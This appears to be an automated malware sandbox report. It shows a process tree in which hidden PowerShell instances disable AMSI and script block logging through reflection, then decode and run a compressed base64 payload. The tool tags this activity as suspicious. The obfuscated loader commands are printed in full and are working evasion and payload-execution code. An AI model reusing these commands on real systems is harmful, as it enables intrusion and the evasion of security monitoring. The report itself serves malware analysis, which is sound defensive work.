gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $znP8=((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if ($btfZ) { $btfZ.GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue($null,$true); }; $zW=((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); $r8D=[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); $qOK=$r8D.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164''+''BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0''+''lq+''+''HJWNiytkpk''+''7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE''+''dehiFPjkeRTcdA/WU+''+''xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}'')-f''='',''f'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -noni -nop -w hidden -c $znP8=(('Scr'+'ipt'+'{1}'+'lock{0}oggi{2}'+'g')-f'L','B','n');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType((('{1}'+'{'+'6}'+'ste'+'m'+'.{'+'0}{9}n{9}'+'{4}'+'emen'+'t.'+'{8}{2}t{7'+'}'+'m{9}ti'+'{7}n'+'.{8'+'}'+'ms'+'i{3'+'}ti'+'{5'+'}s')-f'M','S','u','U','g','l','y','o','A','a')); if ($btfZ) { $btfZ.GetField(((''+'a'+'m{'+'4}iI{0'+'}'+'i{2}{'+'1'+'}'+'ail{3}d')-f'n','F','t','e','s'),'NonPublic,Static').SetValue($null,$true); }; $zW=(('{1}n'+'able{4}c{5}i{0}t'+'{2}'+'lockIn'+'{3}ocat'+'ionLogg'+'ing'+'')-f'p','E','B','v','S','r'); $r8D=[Ref].Assembly.GetType(((''+'{2}{4}stem.{3}'+'anag'+'e'+'men'+'t.A{5}to'+'mation.{0}ti{'+'1}s')-f'U','l','S','M','y','u')); $qOK=$r8D.GetField('cachedGroupPolicySettings','NonPublic,Static'); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=(('En'+'a{3}le'+'{1'+'}criptB'+'loc{'+'2}{0}ogging')-f'L','S','k','b'); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType((('Sy'+'s'+'tem.{5}'+'an'+'a{4}ement.A{3}'+'tomatio'+'n.Script{1}{0}'+'oc{'+'2}')-f'l','B','k','u','g','M')).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAOp2bWcCA7VWbW/aS'+'BD+Xqn/waqQMAoBQ2'+'ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR'+'tJn'+'SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp'+'LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5'+'Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B'+'/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp'+'Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC'+'A{1}bLLzpZ'+'JMCB7QKTAox'+'HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p'+'jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe'+'C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V'+'7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2ujHZzl6s+/5+0q1/cvsEr2PVNlS1QyE3IxVt2/XGKP5iu+/toaHs9kNltzW+17cGsbar/Du8/PAhqC9bg7rrmKyLQg383VutFbFOYC9CrjJZ1l2BX9tg9Xs2pmigN2K6qDeGpP1R00yCLYHhrSbubbL39iLWm164'+'BJ/M4NwOxjFrohXYHQUqeA{1}3gzgvLRN0tA0'+'lq+'+'HJWNiytkpk'+'7RThZ2Sdg2/N3AeVM3NcB//UbtvR2aVjjps+7mj1E+/zO6DkbEgYP2vOS+hPUav{1}vimF581HvHytD{1}VRkoaIAl+hwRTVohMnnbxrDGIiNGQZHh0rnDBMoVVDMy8STaU09kS/yroL9MpDBxMNdWhmHr30V5EeBCvHRlYsXVxMwUeRwV6th1nAw6qyO1MU6EDKTmllO{1}rr99Lj9V4GU1XRwQQqB8M0Mwy2yFKS5d8NE7xQOFTM14F6DTM4eQVFDiruo{1}gI5LQ4po9xO1zqgQFH1ACuBlx6Jp4mQAxQPsW3UomLzv34JVBKx7+TKnnxDOHj/xtVjmv/sPtL9FGqGS7PVp8uPGo5v+3+I0Q4yDnQBCg+PE'+'dehiFPjkeRTcdA/WU+'+'xOv8esNPr+C9lzWhvwEF54n/EgwAAA{0}{0}')-f'=','f')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:980

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\Doc.ps1'"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e YwBtAGQAIAAvAEMAIAAtAC0AJQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AbgBvAHAAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAG4AaQAgAC0AYwAgACIAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAgACQAegBuAFAAOAA9ACgAKAAnACcAUwBjAHIAJwAnACsAJwAnAGkAcAB0ACcAJwArACcAJwB7ADEAfQAnACcAKwAnACcAbABvAGMAawB7ADAAfQBvAGcAZwBpAHsAMgB9ACcAJwArACcAJwBnACcAJwApAC0AZgAnACcATAAnACcALAAnACcAQgAnACcALAAnACcAbgAnACcAKQA7AEkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADMAKQB7ACAAJABiAHQAZgBaAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACgAKAAnACcAewAxAH0AJwAnACsAJwAnAHsAJwAnACsAJwAnADYAfQAnACcAKwAnACcAcwB0AGUAJwAnACsAJwAnAG0AJwAnACsAJwAnAC4AewAnACcAKwAnACcAMAB9AHsAOQB9AG4AewA5AH0AJwAnACsAJwAnAHsANAB9ACcAJwArACcAJwBlAG0AZQBuACcAJwArACcAJwB0AC4AJwAnACsAJwAnAHsAOAB9AHsAMgB9AHQAewA3ACcAJwArACcAJwB9ACcAJwArACcAJwBtAHsAOQB9AHQAaQAnACcAKwAnACcAewA3AH0AbgAnACcAKwAnACcALgB7ADgAJwAnACsAJwAnAH0AJwAnACsAJwAnAG0AcwAnACcAKwAnACcAaQB7ADMAJwAnACsAJwAnAH0AdABpACcAJwArACcAJwB7ADUAJwAnACsAJwAnAH0AcwAnACcAKQAtAGYAJwAnAE0AJwAnACwAJwAnAFMAJwAnACwAJwAnAHUAJwAnACwAJwAnAFUAJwAnACwAJwAnAGcAJwAnACwAJwAnAGwAJwAnACwAJwAnAHkAJwAnACwAJwAnAG8AJwAnACwAJwAnAEEAJwAnACwAJwAnAGEAJwAnACkAKQA7ACAAaQBmACAAKAAkAGIAdABmAFoAKQAgAHsAIAAkAGIAdABmAFoALgBHAGUAdABGAGkAZQBsAGQAKAAoACgAJwAnACcAJwArACcAJwBhACcAJwArACcAJwBtAHsAJwAnACsAJwAnADQAfQBpAEkAewAwACcAJwArACcAJwB9ACcAJwArACcAJwBpAHsAMgB9AHsAJwAnACsAJwAnADEAJwAnACsAJwAnAH0AJwAnACsAJwAnAGEAaQBsAHsAMwB9AGQAJwAnACkALQBmACcAJwBuACcAJwAsACcAJwBGACcAJwAsACcAJwB0ACcAJwAsACcAJwBlACcAJwAsACcAJwBzACcAJwApACwAJwAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwAnACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7ACAAfQA7ACAAJAB6AFcAPQAoACgAJwAnAHsAMQB9AG4AJwAnACsAJwAnAGEAYgBsAGUAewA0AH0AYwB7ADUAfQBpAHsAMAB9AHQAJwAnACsAJwAnAHsAMgB9ACcAJwArACcAJwBsAG8AYwBrAEkAbgAnACcAKwAnACcAewAzAH0AbwBjAGEAdAAnACcAKwAnACcAaQBvAG4ATABvAGcAZwAnACcAKwAnACcAaQBuAGcAJwAnACsAJwAnACcAJwApAC0AZgAnACcAcAAnACcALAAnACcARQAnACcALAAnACcAQgAnACcALAAnACcAdgAnACcALAAnACcAUwAnACcALAAnACcAcgAnACcAKQA7ACAAJAByADgARAA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAoACgAJwAnACcAJwArACcAJwB7ADIAfQB7ADQAfQBzAHQAZQBtAC4AewAzAH0AJwAnACsAJwAnAGEAbgBhAGcAJwAnACsAJwAnAGUAJwAnACsAJwAnAG0AZQBuACcAJwArACcAJwB0AC4AQQB7ADUAfQB0AG8AJwAnACsAJwAnAG0AYQB0AGkAbwBuAC4AewAwAH0AdABpAHsAJwAnACsAJwAnADEAfQBzACcAJwApAC0AZgAnACcAVQAnACcALAAnACcAbAAnACcALAAnACcAUwAnACcALAAnACcATQAnACcALAAnACcAeQAnACcALAAnACcAdQAnACcAKQApADsAIAAkAHEATwBLAD0AJAByADgARAAuAEcAZQB0AEYAaQBlAGwAZAAoACcAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcAJwAsACcAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAJwApADsAIABJAGYAIAAoACQAcQBPAEsAKQAgAHsAIAAkAGsATQBaAD0AJABxAE8ASwAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApADsAIAAkAHkASQB6AGMAbAA9AFsAQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwAuAEQAaQBjAHQAaQBvAG4AYQByAHkAWwBzAHQAcgBpAG4AZwAsAFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAXQBdADoAOgBuAGUAdwAoACkAOwAgACQAdAA4AFoAWAA3AD0AKAAoACcAJwBFAG4AJwAnACsAJwAnAGEAewAzAH0AbABlACcAJwArACcAJwB7ADEAJwAnACsAJwAnAH0AYwByAGkAcAB0AEIAJwAnACsAJwAnAGwAbwBjAHsAJwAnACsAJwAnADIAfQB7ADAAfQBvAGcAZwBpAG4AZwAnACcAKQAtAGYAJwAnAEwAJwAnACwAJwAnAFMAJwAnACwAJwAnAGsAJwAnACwAJwAnAGIAJwAnACkAOwAgAEkAZgAoACQAawBNAFoAWwAkAHoAbgBQADgAXQApAHsAIAAkAGsATQBaAFsAJAB6AG4AUAA4AF0AWwAkAHoAVwBdAD0AMAA7ACAAJABrAE0AWgBbACQAegBuAFAAOABdAFsAJAB0ADgAWgBYADcAXQA9ADAAOwAgAH0AIAAkAHkASQB6AGMAbAAuAEEAZABkACgAJAB6AFcALAAwACkAOwAgACQAeQBJAHoAYwBsAC4AQQBkAGQAKAAkAHQAOABaAFgANwAsADAAKQA7ACAAJABrAE0AWgBbACcAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAAnACcAKwAkAHoAbgBQADgAXQA9ACQAeQBJAHoAYwBsADsAIAB9ACAARQBsAHMAZQAgAHsAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAoACcAJwBTAHkAJwAnACsAJwAnAHMAJwAnACsAJwAnAHQAZQBtAC4AewA1AH0AJwAnACsAJwAnAGEAbgAnACcAKwAnACcAYQB7ADQAfQBlAG0AZQBuAHQALgBBAHsAMwB9ACcAJwArACcAJwB0AG8AbQBhAHQAaQBvACcAJwArACcAJwBuAC4AUwBjAHIAaQBwAHQAewAxAH0AewAwAH0AJwAnACsAJwAnAG8AYwB7ACcAJwArACcAJwAyAH0AJwAnACkALQBmACcAJwBsACcAJwAsACcAJwBCACcAJwAsACcAJwBrACcAJwAsACcAJwB1ACcAJwAsACcAJwBnACcAJwAsACcAJwBNACcAJwApACkALgBHAGUAdABGAGkAZQBsAGQAKAAnACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACcALAAnACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMALgBIAGEAcwBoAFMAZQB0AFsAcwB0AHIAaQBuAGcAXQApACkAOwAgAH0AfQA7ACYAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBjAHIAZQBhAHQAZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAKAAnACcASAA0AHMASQBBAE8AcAAyAGIAVwBjAEMAQQA3AFYAVwBiAFcALwBhAFMAJwAnACsAJwAnAEIARAArAFgAcQBuAC8AdwBhAHEAUQBNAEEAbwBCAFEAMgAnACcAKwAnACcAaQBiAFIAcQBwADAAdABqAEgAQgBMAGkAUwA0AEQAdQBhAHQANgBMAFQAWQBpADcAMQBsAHYAUwBiADIARQBpAEMAOQAvAHYAZQBiAE4AWABaAEkAbABPAFMAdQBkADEATAAzAGkANwAyADcATQA3AE8AegB6AHoAdwB6AHMAOABzAE4AOAB6AGkASgBtAGUAUQBiADAAbwArADMAYgA2AFIAOABEAEYAQwBDAEkAawBrAHUANwBaADMAcgBxAGwAUQBLAHcAOABwAHgAcQAzAFMAcgBSACcAJwArACcAJwB0AEoAbgAnACcAKwAnACcAUwBaADYAcAA2ADMAVQA3AGoAaABCAGgAOAA0AHMATAB7ADEAfQBaAE0AawBtAFAASABEAHYASABhAEoAdQBaAHEAbQBPAEYAcABRAGcAbABPADUASQB2ADAAbABqAFUASwBjADQATgBQAHIAeABYAHsAMQB9AHMAYwBlAG0ASABWAFAAcQB6AGQAawBuAGoAQgBhAEsANQAyAEYANQBIAFgAbwBpAGwAVQA1AFgANQBZAHEAOABYAGUAMABnADQAVgBYAFAAVwBsAEgAQwA1AC8ATwAxAGIAdQBUAEkANwBiAGMAeAByAHgAdQAwAEcAMABWAFEAdQBPAC8AdQBVADQANgBqAG0AVQAxAHEAdQBTAEQAOAByADQAcwBDAGIALwBSAHIATAA1AFQANwB4AGsAagBpAE4AbAA3AHcAMgBJAHUAeQBzAFcAUgB1AHkARgBDADMAeABGAFYAaQA3AHcAMwAzAE0AdwA5AGgAUAB5ADMAQwBYADQAMgAwAFMAegBEAGMASgB5AHkANABsAHIAQgB4AGsANQBEAEwAOABEAHAAJwAnACsAJwAnAEwAWQBVADMAMAAvAHcAVwBsAGEAcgBrAG8AegBZAFgAOAAyAG4ALwA4AGgAegAvAEwARAB2ADIANABZAEoAeABHAHUAbQBZAHoAagBKAEYANAA3AE8ATABrAGoASABrADUAcgBYAGMAUgA4AGkAcgAvAGkANQBSAHkAMABIAEoANABRAEYAcwB3AHIARgBSAEMANwBpADEAZABZAEwAcgBFAE4AcABWAFgAcAB2ADUAaQBSAHIALwBDADIAZwBPADUAWABsAGUAVABIAFMAaQBBADEANABFAG0AbABDAHYARgA4AHsAMQB9AHMAMQArADcARwA4AG8AUABpAGkAVwBYAC8AQgBUAFUASwBBAEMANAAwAEEARAB3AE8ANgBuAGcARwA5AFoAMABDAFkANQAnACcAKwAnACcAUQA4ADQATAB4AEQAawB1AEYARwBPAFcANwBXAEQAdwBWAHgANwBFAEsAYwBtAFUAUAAwAHQASwBWAGUAcgBEADAAWQBqAEgAeQBSADYAbQBwAFoAdABrAGcAeQB2AHoAQgA3AFMAbABVAG4AS